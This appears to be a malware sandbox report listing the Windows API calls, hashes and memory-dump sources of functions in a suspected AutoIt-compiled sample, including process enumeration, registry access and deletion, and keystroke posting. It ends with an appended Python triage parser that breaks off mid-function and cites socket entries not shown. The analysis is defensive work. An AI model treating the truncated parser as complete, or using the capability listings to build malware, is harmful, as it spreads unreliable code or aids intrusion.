                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3c933ce1d9e643199c7e67f74c4aeba0ff020dc6c6fa7c2eb9cde64c1ffe6fb2
                                                                                        • Instruction ID: 41c41db99954c073182824cb86ab4284ff6df32abb683c8c43387178d6a1302b
                                                                                        • Opcode Fuzzy Hash: 3c933ce1d9e643199c7e67f74c4aeba0ff020dc6c6fa7c2eb9cde64c1ffe6fb2
                                                                                        • Instruction Fuzzy Hash: A6715CB1A00109EFCB14CF98CC49ABEBB79FF85314F188159FA19AA255C730AA41DB61
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F4225A
                                                                                        • _memset.LIBCMT ref: 00F42323
                                                                                        • ShellExecuteExW.SHELL32(?), ref: 00F42368
                                                                                          • Part of subcall function 00EE936C: __swprintf.LIBCMT ref: 00EE93AB
                                                                                          • Part of subcall function 00EE936C: __itow.LIBCMT ref: 00EE93DF
                                                                                          • Part of subcall function 00EFC6F4: _wcscpy.LIBCMT ref: 00EFC717
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F4242F
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00F4243E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                        • String ID: @
                                                                                        • API String ID: 4082843840-2766056989
                                                                                        • Opcode ID: 1c7d70de37aa4e62422429da35b2c4d6a039ed642d677848d40f7b00a2aa6e42
                                                                                        • Instruction ID: 1984f77fb36ed5f130e2d3fcba0a8669243c88fa77c8d7be48d9e97806096fc3
                                                                                        • Opcode Fuzzy Hash: 1c7d70de37aa4e62422429da35b2c4d6a039ed642d677848d40f7b00a2aa6e42
                                                                                        • Instruction Fuzzy Hash: 95715E75A006199FCF04EFA5D9819AEBBF5FF48310F108469E855BB3A2DB34AD40DB90
                                                                                        APIs
                                                                                        • GetParent.USER32(?), ref: 00F23DE7
                                                                                        • GetKeyboardState.USER32(?), ref: 00F23DFC
                                                                                        • SetKeyboardState.USER32(?), ref: 00F23E5D
                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00F23E8B
                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00F23EAA
                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00F23EF0
                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F23F13
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 87235514-0
                                                                                        • Opcode ID: 5917f41153d9376fefa9b4b8e0811f198c030178de8d563744eb203da95ebb6f
                                                                                        • Instruction ID: 1c89243ad14900a570b90782bd102ab22452d4ae8d4dba2efdee218e6ecfec0c
                                                                                        • Opcode Fuzzy Hash: 5917f41153d9376fefa9b4b8e0811f198c030178de8d563744eb203da95ebb6f
                                                                                        • Instruction Fuzzy Hash: 2251D2E0E047E53DFB364324AC45BBA7EA95B06314F084589E1D9468C2D3ECAED8F750
                                                                                        APIs
                                                                                        • GetParent.USER32(00000000), ref: 00F23C02
                                                                                        • GetKeyboardState.USER32(?), ref: 00F23C17
                                                                                        • SetKeyboardState.USER32(?), ref: 00F23C78
                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F23CA4
                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F23CC1
                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F23D05
                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F23D26
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 87235514-0
                                                                                        • Opcode ID: 21c8a5ae5f830d07d9a33a8f301b972f24e6ebe7c19ff4f09c51d79a65a99bc2
                                                                                        • Instruction ID: 81d59f231364d9ae90e79ea27569a4d2e165e48652f60e2a34fb339a8ad4746e
                                                                                        • Opcode Fuzzy Hash: 21c8a5ae5f830d07d9a33a8f301b972f24e6ebe7c19ff4f09c51d79a65a99bc2
                                                                                        • Instruction Fuzzy Hash: 805106E0A447E93DFB328724DC45B76BF99AB06310F088489E1D55A8C2D298EE94F750
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsncpy$LocalTime
                                                                                        • String ID:
                                                                                        • API String ID: 2945705084-0
                                                                                        • Opcode ID: cfa142cf4c881c606a2c5fd8fbe95c321308153daf46683c73fef591b006d385
                                                                                        • Instruction ID: 0e337fb266b5574d709702ac81d9d2734ee35bf5764e5e3be5e0fd7e6177a3f2
                                                                                        • Opcode Fuzzy Hash: cfa142cf4c881c606a2c5fd8fbe95c321308153daf46683c73fef591b006d385
                                                                                        • Instruction Fuzzy Hash: C4415C66D14314B6DB10EBF4CC4AACFB7ACAF05310F518966E518E31A1FA38E614A3A5
                                                                                        APIs
                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00F43DA1
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F43DCB
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00F43E80
                                                                                          • Part of subcall function 00F43D72: RegCloseKey.ADVAPI32(?), ref: 00F43DE8
                                                                                          • Part of subcall function 00F43D72: FreeLibrary.KERNEL32(?), ref: 00F43E3A
                                                                                          • Part of subcall function 00F43D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F43E5D
                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F43E25
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                        • String ID:
                                                                                        • API String ID: 395352322-0
                                                                                        • Opcode ID: 01665cd09c760f965a6c80a3d4ff6c6d610cd09edfddbcf14538e08979009143
                                                                                        • Instruction ID: 674ab53838a1008d0a2487aa1b96b7ae043bf78b540310386529eed67350cfa4
                                                                                        • Opcode Fuzzy Hash: 01665cd09c760f965a6c80a3d4ff6c6d610cd09edfddbcf14538e08979009143
                                                                                        • Instruction Fuzzy Hash: 5A31CDB1D01109BFEB159F95DC85AFFBBBCEF08310F000569E912A2151D7749F49AB60
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F48FE7
                                                                                        • GetWindowLongW.USER32(0102D688,000000F0), ref: 00F4901A
                                                                                        • GetWindowLongW.USER32(0102D688,000000F0), ref: 00F4904F
                                                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00F49081
                                                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00F490AB
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00F490BC
                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F490D6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongWindow$MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 2178440468-0
                                                                                        • Opcode ID: db578ac6dda84797203e0946e3756208ed316e259cfcc594e81ad1f36c2c346a
                                                                                        • Instruction ID: 4576b0cfc726f3f6d4a678fb676fd0d003c92b1ccc31c90b403b3c10b2481be9
                                                                                        • Opcode Fuzzy Hash: db578ac6dda84797203e0946e3756208ed316e259cfcc594e81ad1f36c2c346a
                                                                                        • Instruction Fuzzy Hash: 80311975B041199FDB20CF68DC84F563BA5FB4A764F154164F925CB2B1CBB2AC40EB41
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F208F2
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F20918
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00F2091B
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00F20939
                                                                                        • SysFreeString.OLEAUT32(?), ref: 00F20942
                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00F20967
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00F20975
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                        • String ID:
                                                                                        • API String ID: 3761583154-0
                                                                                        • Opcode ID: f6033d7ca6acc38ddb04d35691be59c62613617640eb688092d484c4911a2409
                                                                                        • Instruction ID: 187304280cb2fa2be7727e721e2a0151949ddfc5488c1567fe57f4e54d122931
                                                                                        • Opcode Fuzzy Hash: f6033d7ca6acc38ddb04d35691be59c62613617640eb688092d484c4911a2409
                                                                                        • Instruction Fuzzy Hash: C2215677A01219AFAB109FB8DC88DBB73ACEB09370B048125F915DB252DA70EC45D760
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                        • API String ID: 1038674560-2734436370
                                                                                        • Opcode ID: 8cf14028a5c87dfb361cca16029c8335ef67e18813f3cf7cfa5302c443b5ddf7
                                                                                        • Instruction ID: 06b6bab3ff77ae6651fe32a2e3df9a441fb31a64ddf228f39f674cb9d5ab9a5d
                                                                                        • Opcode Fuzzy Hash: 8cf14028a5c87dfb361cca16029c8335ef67e18813f3cf7cfa5302c443b5ddf7
                                                                                        • Instruction Fuzzy Hash: E5216A3260413577D720FB24AD13FBB73D8EF64310F64C426F549A7082E7559942F2A1
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F209CB
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F209F1
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00F209F4
                                                                                        • SysAllocString.OLEAUT32 ref: 00F20A15
                                                                                        • SysFreeString.OLEAUT32 ref: 00F20A1E
                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00F20A38
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00F20A46
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                        • String ID:
                                                                                        • API String ID: 3761583154-0
                                                                                        • Opcode ID: 561bc61c53eb910b22eff949e0bded95b14ea64348e5536655d0a45b8a4128a4
                                                                                        • Instruction ID: fc6560f87ad6d580f4a5dba07a2168bfa86dcc189570981e669dc58d12624bc4
                                                                                        • Opcode Fuzzy Hash: 561bc61c53eb910b22eff949e0bded95b14ea64348e5536655d0a45b8a4128a4
                                                                                        • Instruction Fuzzy Hash: 2A217776600218AFDB10DFA8DC88D6B77ECEF083607448125F919CB261DA74EC419B64
                                                                                        APIs
                                                                                          • Part of subcall function 00EFD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EFD1BA
                                                                                          • Part of subcall function 00EFD17C: GetStockObject.GDI32(00000011), ref: 00EFD1CE
                                                                                          • Part of subcall function 00EFD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EFD1D8
                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F4A32D
                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F4A33A
                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F4A345
                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F4A354
                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F4A360
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                        • String ID: Msctls_Progress32
                                                                                        • API String ID: 1025951953-3636473452
                                                                                        • Opcode ID: 0092d0f1c2557c080e46d0e614d298b088bc698b8528be607e47d69bba2249e3
                                                                                        • Instruction ID: cced10d54f697aa334800af1d070a39aaeed1d63e444e59b30bc2d8abe366604
                                                                                        • Opcode Fuzzy Hash: 0092d0f1c2557c080e46d0e614d298b088bc698b8528be607e47d69bba2249e3
                                                                                        • Instruction Fuzzy Hash: FF1190B155021DBEEF119F64CC85EEB7F6DFF097A8F014114FA08A60A0C6729C21EBA4
                                                                                        APIs
                                                                                        • GetClientRect.USER32(?,?), ref: 00EFCCF6
                                                                                        • GetWindowRect.USER32(?,?), ref: 00EFCD37
                                                                                        • ScreenToClient.USER32(?,?), ref: 00EFCD5F
                                                                                        • GetClientRect.USER32(?,?), ref: 00EFCE8C
                                                                                        • GetWindowRect.USER32(?,?), ref: 00EFCEA5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Rect$Client$Window$Screen
                                                                                        • String ID:
                                                                                        • API String ID: 1296646539-0
                                                                                        • Opcode ID: 8b511cf3e0ef47b4c5089becf614fa995073e05a5d44498a3501b969fda696b5
                                                                                        • Instruction ID: 7d6c2125f63058fc887e63ef2544edd84a3a7183edcbbf64af28fe363f562432
                                                                                        • Opcode Fuzzy Hash: 8b511cf3e0ef47b4c5089becf614fa995073e05a5d44498a3501b969fda696b5
                                                                                        • Instruction Fuzzy Hash: 3CB15979A0024DDBDB14CFA8C5807FDBBB1FF08310F249129EE59AB250DB70AA54DB64
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00F41C18
                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00F41C26
                                                                                        • __wsplitpath.LIBCMT ref: 00F41C54
                                                                                          • Part of subcall function 00F01DFC: __wsplitpath_helper.LIBCMT ref: 00F01E3C
                                                                                        • _wcscat.LIBCMT ref: 00F41C69
                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00F41CDF
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00F41CF1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                        • String ID:
                                                                                        • API String ID: 1380811348-0
                                                                                        • Opcode ID: c116bf14d37f89a4b446dbbb9c7f84da844a0364e5a1bac07a8ec28273fee78e
                                                                                        • Instruction ID: b1b05833ae88560dbe517459f3635c49ad21fd44067283022335acf7ffa981df
                                                                                        • Opcode Fuzzy Hash: c116bf14d37f89a4b446dbbb9c7f84da844a0364e5a1bac07a8ec28273fee78e
                                                                                        • Instruction Fuzzy Hash: 3B517E715043449FD720EF24CC85EABBBE8EF88754F00491EF989A7291EB74D905DB92
                                                                                        APIs
                                                                                          • Part of subcall function 00F43C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F42BB5,?,?), ref: 00F43C1D
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F430AF
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F430EF
                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F43112
                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F4313B
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F4317E
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F4318B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                        • String ID:
                                                                                        • API String ID: 3451389628-0
                                                                                        • Opcode ID: c78775a3d54a947b1dca08b4fbe46be4b859831376a5f93589928dcf65105876
                                                                                        • Instruction ID: d60baa30161e1a0ac9dedbe62f1f560359153fe33a1c7e7c9c5397f8787e579e
                                                                                        • Opcode Fuzzy Hash: c78775a3d54a947b1dca08b4fbe46be4b859831376a5f93589928dcf65105876
                                                                                        • Instruction Fuzzy Hash: ED516631608244AFC704EF68CC85E6ABBE9FF88314F04491DF995972A1DB71EA05EB52
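The two entries above (the Toolhelp32 process walk at 00F41C18-00F41CF1 and the registry value enumeration at 00F430AF-00F4318B) are the kind of per-function API lists a triager scans for reconnaissance behaviour. The following parser is an added example for this page, not Joe Sandbox code: it reads the bullet lines in the format shown here, resolves the WSOCK32 ordinal import written as "#16" (recv), and flags a function when a full set of related APIs is present. The behaviour labels in BEHAVIOURS are this example's own assumptions; the sample strings are the process, registry and socket entries from this report, embedded inline so the script runs offline.

```python
"""Parse the per-function "APIs" lists of a Joe Sandbox disassembly report
and flag call patterns a triager looks for (process enumeration, registry
enumeration, socket receive).

Added example for this page, not Joe Sandbox code. The BEHAVIOURS table and
its labels are this example's own assumptions.
"""
import re
from typing import List, NamedTuple, Optional, Tuple


class ApiCall(NamedTuple):
    api: str                   # import name, or "#<ordinal>" for ordinal imports
    module: str                # KERNEL32, ADVAPI32, WSOCK32, LIBCMT (static CRT) ...
    args: Tuple[str, ...]      # argument values as printed; "?" means unresolved
    ref: int                   # address of the call site
    subcall_of: Optional[int]  # set when the call sits in a subroutine this function calls


# Bullet forms used in the report:
#   • Process32FirstW.KERNEL32(00000000,?), ref: 00F41C26
#   • _wcscat.LIBCMT ref: 00F41C69
#     • Part of subcall function 00F01DFC: __wsplitpath_helper.LIBCMT ref: 00F01E3C
#   • #16.WSOCK32(?,?,00000000,00000000), ref: 00F38EC5
_CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[#\w]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# WSOCK32 exports by ordinal; the report prints "#16" when the import is
# by ordinal rather than by name. Only the ordinals needed here are listed.
WSOCK32_ORDINALS = {16: "recv", 18: "select", 19: "send"}

# API sets that together indicate a behaviour (assumed labels for this example).
BEHAVIOURS = {
    "process enumeration via Toolhelp32":
        {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
    "registry value enumeration": {"RegOpenKeyExW", "RegEnumValueW"},
    "remote registry access": {"RegConnectRegistryW"},
    "socket receive with select() timeout": {"select", "recv"},
}


def parse_api_block(text: str) -> List[ApiCall]:
    """Return one ApiCall per bullet; headings and unrelated lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = _CALL_RE.match(line)
        if not m:
            continue
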